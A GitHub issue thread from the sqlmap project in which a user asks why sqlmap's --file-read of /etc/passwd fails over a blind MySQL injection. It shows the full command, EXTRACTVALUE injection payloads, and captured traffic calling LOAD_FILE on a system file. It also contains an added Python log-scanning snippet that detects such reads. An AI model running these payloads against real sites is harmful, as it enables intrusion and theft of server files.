sqlmapproject / sqlmap

Automatic SQL injection and database takeover tool
http://sqlmap.org

File-Read Command in SQLMap Despite Admin / And Privileges #5774

Closed agx47 closed 2 months ago

agx47 commented 3 months ago

Hello,

I’m experiencing an issue when running the file-read command. Although I am the admin and have all the necessary privileges, this specific command is not working, even though other commands function correctly.

Here’s what I’ve tried:

sqlmap.py -u "https://target.com/index.php?route=" --technique=BE --file-read=/etc/passwd -t traffic.html --risk=2 --level=5 --fresh-queries --no-cast

Also tried --hex and tamper=between.

Sqlmap response:

Parameter: post_id (GET)
Type: boolean-based blind
Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: route=extension/d_blog_module/post&post_id=18' AND EXTRACTVALUE(4226,CASE WHEN (4226=4226) THEN 4226 ELSE 0x3A END) AND 'UFKR'='UFKR

[19:46:02] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.10 or 19.10 or 20.04 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: MySQL 8
[19:46:02] [INFO] fingerprinting the back-end DBMS operating system
[19:46:04] [WARNING] reflective value(s) found and filtering out
[19:46:04] [INFO] the back-end DBMS operating system is Linux
[19:46:04] [INFO] fetching file: '/etc/passwd'
[19:46:04] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[19:46:04] [INFO] retrieved:

Traffic HTML response that I captured:

&post_id=18%27%20AND%20EXTRACTVALUE%284764%2CCASE%20WHEN%20%280x57%3DUPPER%28MID%28%40%40version_compile_os%2C1%2C1%29%29%29%20THEN%204764%20ELSE%200x3A%20END%29%20AND%20%27dwQo%27%3D%27dwQo
Fatal error: Uncaught Exception: Error: XPATH syntax error: ':' Error No: 1105

post_id=18%27%20AND%20EXTRACTVALUE%283497%2CCASE%20WHEN%20%28ORD%28MID%28%28HEX%28LOAD_FILE%280x2f6574632f706173737764%29%29%29%2C1%2C1%29%29%3E66%29%20THEN%203497%20ELSE%200x3A%20END%29%20AND%20%27CZYM%27%3D%27CZYM
Fatal error: Uncaught Exception: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';66) THEN 3497 ELSE 0x3A END) AND 'CZYM'='CZYM' AND p.status = '1' AND pd.langua' at line 1 Error No: 1064

I'm a noob and I admit it, so am I doing something wrong?!
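For anyone reviewing web server logs, the file-read attempt in the captured traffic above can be recognised and its target path decoded. This is an added example, not part of the original thread and not sqlmap code; the function names and the benign third request are assumptions made for illustration.

```python
import re
from urllib.parse import unquote_plus

# Query strings copied from the captured traffic in the post above, plus one
# constructed benign request for contrast.
SAMPLE_QUERIES = [
    "post_id=18%27%20AND%20EXTRACTVALUE%284764%2CCASE%20WHEN%20%280x57%3DUPPER%28MID%28%40%40version_compile_os%2C1%2C1%29%29%29%20THEN%204764%20ELSE%200x3A%20END%29%20AND%20%27dwQo%27%3D%27dwQo",
    "post_id=18%27%20AND%20EXTRACTVALUE%283497%2CCASE%20WHEN%20%28ORD%28MID%28%28HEX%28LOAD_FILE%280x2f6574632f706173737764%29%29%29%2C1%2C1%29%29%3E66%29%20THEN%203497%20ELSE%200x3A%20END%29%20AND%20%27CZYM%27%3D%27CZYM",
    "post_id=18",
]

# LOAD_FILE( followed by a hex literal or a quoted string literal.
LOAD_FILE_RE = re.compile(r"""LOAD_FILE\s*\(\s*(0x[0-9a-f]+|'[^']*'|"[^"]*")""", re.I)


def normalize(raw, max_rounds=3):
    """URL-decode a bounded number of times (catches double encoding),
    then drop inline SQL comments used to split keywords from '('."""
    for _ in range(max_rounds):
        decoded = unquote_plus(raw)
        if decoded == raw:
            break
        raw = decoded
    return re.sub(r"/\*.*?\*/", "", raw, flags=re.S)


def decode_arg(arg):
    """Turn a LOAD_FILE argument into the path it names."""
    if arg.lower().startswith("0x"):
        try:
            return bytes.fromhex(arg[2:]).decode("utf-8", "replace")
        except ValueError:  # odd number of hex digits: report it undecoded
            return arg
    return arg[1:-1]  # strip the surrounding quotes


def find_file_reads(query):
    """Return every file path a query string asks LOAD_FILE to read."""
    return [decode_arg(m.group(1)) for m in LOAD_FILE_RE.finditer(normalize(query))]


if __name__ == "__main__":
    for q in SAMPLE_QUERIES:
        print(find_file_reads(q) or "no LOAD_FILE call", "<-", q[:40])
```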

selectfromblackhydra commented 3 months ago

MySQL 8 is not allowed to read files using load_file; only MySQL 5 can read files using load_file. Sorry if I'm wrong.

agx47 commented 3 months ago

That would make sense if you are sure ...

stamparm commented 2 months ago

I am the admin and have all the necessary privileges <- no, you don't have all necessary privileges.
